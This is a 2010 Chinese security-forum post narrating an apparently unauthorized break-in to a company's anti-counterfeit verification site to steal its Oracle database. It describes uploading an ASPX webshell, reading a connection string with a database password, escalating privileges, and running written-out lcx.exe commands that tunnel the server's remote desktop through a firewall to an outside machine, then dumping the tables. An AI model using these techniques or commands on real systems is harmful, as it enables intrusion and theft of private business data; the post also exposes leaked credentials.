D0000D发往论坛板块-------------------------------------------------------
No2  号板块  技术文章
D8888D贴子标题-------------------------------------------------------
一次Oracle数据库拿库过程
D8888D主贴内容-------------------------------------------------------
 

作者：杀虫剂 
出处：BHST友情提交T00LS

朋友接了个项目叫我帮着做下，目标是拿个产品数码的16位验证，闲着无聊就答应了。(图1)
[img]http://www.t00ls.net/images/default/attachimg.gif[/img]  [img]http://www.t00ls.net/attachments/month_1004/1004140135bf78d6bdd40a0116.jpg[/img][url=http://www.t00ls.net/attachment.php?aid=NTExNXw1YzNmYTQ4YXwxMjg2NDgxODAxfGUzMWR6MVdGSzFvU0FMSExzVkxXd3JTT0dzdVVoUTFzWTZCNUxReUpneFB5M1dF&nothumb=yes]链接标记下载[/url] (16.55 KB)

2010-4-14 01:35
打开[url=http://www.XX.com.cn/chaxun.asp]链接标记http://www.XX.com.cn/chaxun.asp[/url]输入他发的测试数据XXX2632338272143
页面跳转到[url=http://www.XX.com.cn/fwMain-1.asp?InputText=XXX2632338272143&yz=5007]链接标记http://www.XX.com.cn/fwMain-1.as ... 8272143&yz=5007[/url]
完成一次查询并且把查询的结果返回到页面上。
**********************************************
您查询的号码已在2010年4月8日12时13分钟37秒查询过，该号码已失效。请您谨防假冒！ 

你查询的号码是：XXX2632338272143 
**********************************************
拿SHELL的过程就不说了，支持ASPX把ASPX马传上方便操作！
打开目录下的fwMain-1.asp显示数据连接在\include\datasource.asp里

**********************************************
<%
dim strConnect,cnn
strConnect="rovider=MSDAORA.1;assword=0041874_ar;User ID=sno;Data Source=3500;Persist Security Info=True"
set cnn=server.CreateObject("adodb.connection")
cnn.Open strConnect
'rst.Open "select * from t_trace_d",cnn,1,3
%>
**********************************************
里面包含了数据库名，帐号，密码用SHELL下的MSSQL连接显示出错 (图2)
[img]http://www.t00ls.net/images/default/attachimg.gif[/img]  [img]http://www.t00ls.net/attachments/month_1004/1004140135ff85ee2a4c7d4fc8.jpg[/img][url=http://www.t00ls.net/attachment.php?aid=NTExNnxiNTg5N2RiYXwxMjg2NDgxODAxfGUzMWR6MVdGSzFvU0FMSExzVkxXd3JTT0dzdVVoUTFzWTZCNUxReUpneFB5M1dF&nothumb=yes]链接标记下载[/url] (20.88 KB)

2010-4-14 01:35
有些奇怪连接不上，在WEBSHELL的CMD下netstat -an没开1433 1521 3306端口  但是却有连接C段的一台服务器1521端口220.250.12X.19
**********************************************
  TCP    220.250.12X.33:3940    220.250.12X.19:1521    ESTABLISHED  
  TCP    220.250.12X.33:3958    220.250.12X.19:1521    ESTABLISHED  
  TCP    220.250.12X.33:4148    220.250.12X.19:1521    CLOSE_WAIT  
  TCP    220.250.12X.33:4383    220.250.12X.19:1521    ESTABLISHED  
  TCP    220.250.12X.33:4476    220.250.12X.19:1521    ESTABLISHED
**********************************************
以下所有操作我都选择在了晚上12点后，初步判断数据应该是在220.250.12X.19上后就开始提权了！由于WEB服务器上面装有360提权卫士很容易的就拿下了权限
感谢下360提权卫士  你真的很好很强大！！！
上面有防火墙或者某些限制不能直接远程他的3389  这里传了个LCX到做转发。注意如果本机是XP系统请装个虚拟机。
本机
C:\>lcx.exe -listen 51 3389
ASPX WEB
/c c:\windows\temp\lcx.exe -slave 本机IP 51 肉鸡ip 3380
/c c:\windows\temp\lcx.exe -slave 202.104.X.97 51 220.250.12X.33 3389
这样就跳过了些防火墙的限制  把远程3389转发到了本地3380端口  在本地连接127.0.0.1:3380
我用了台服务器做跳板(图3)
[img]http://www.t00ls.net/images/default/attachimg.gif[/img]  [img]http://www.t00ls.net/attachments/month_1004/100414013646eaf91ff50c4bb7.jpg[/img][url=http://www.t00ls.net/attachment.php?aid=NTExN3wxMzRmZTlmZHwxMjg2NDgxODAxfGUzMWR6MVdGSzFvU0FMSExzVkxXd3JTT0dzdVVoUTFzWTZCNUxReUpneFB5M1dF&nothumb=yes]链接标记下载[/url] (31.98 KB)

2010-4-14 01:36
查找Oracle tnsnames.ora文件，用写字板或记事本打开，里面存有连接库的SID和连接IP确定了数据库是在220.250.12X.19上
CMD下输入EXP提示不是内部或外部命令，也不是可运行的程序。
输入sqlplus按提示输入用户和密码 提示错误！查看了资料应该是某些服务没启动或者Oracle文件没装全(图4)
[img]http://www.t00ls.net/images/default/attachimg.gif[/img]  [img]http://www.t00ls.net/attachments/month_1004/1004140136a43f61b30cfd6166.jpg[/img][url=http://www.t00ls.net/attachment.php?aid=NTExOHxiNzYyZmQzOXwxMjg2NDgxODAxfGUzMWR6MVdGSzFvU0FMSExzVkxXd3JTT0dzdVVoUTFzWTZCNUxReUpneFB5M1dF&nothumb=yes]链接标记下载[/url] (23.88 KB)

2010-4-14 01:36
查资料和经过高人提点在这里用到个图形导库软件PL/SQL Developer，在天空软件站上下载安装，输入用户，密码，数据库名登陆成功右面tables点击找到的表段Query date成功得到数据Down下
导出格式可以自己选择HTML或者XML等..结束(图5)
[img]http://www.t00ls.net/images/default/attachimg.gif[/img]  [img]http://www.t00ls.net/attachments/month_1004/10041401376ad31076cd12f45e.jpg[/img][url=http://www.t00ls.net/attachment.php?aid=NTExOXxiMDc0YWRhNHwxMjg2NDgxODAxfGUzMWR6MVdGSzFvU0FMSExzVkxXd3JTT0dzdVVoUTFzWTZCNUxReUpneFB5M1dF&nothumb=yes]链接标记下载[/url] (55.35 KB)

2010-4-14 01:37
PS:Thank不是Think 哈哈，希望色狼你老婆看了别吃醋！感谢职业色狼你百忙之中的教程,很细心的通过EMIL传过来,
并且牺牲晚上的休息时间帮我分析脚本查询,并且DOWN下数据  我不知道用什么的心情来表达  真的非常谢谢你.其中用到的一些导入导出命令和tnsnames.ora的配置!以及在查库导库方面的失败的信息这里就没一一写上!如果你在学习过程中碰到同样的困难可以PM我.
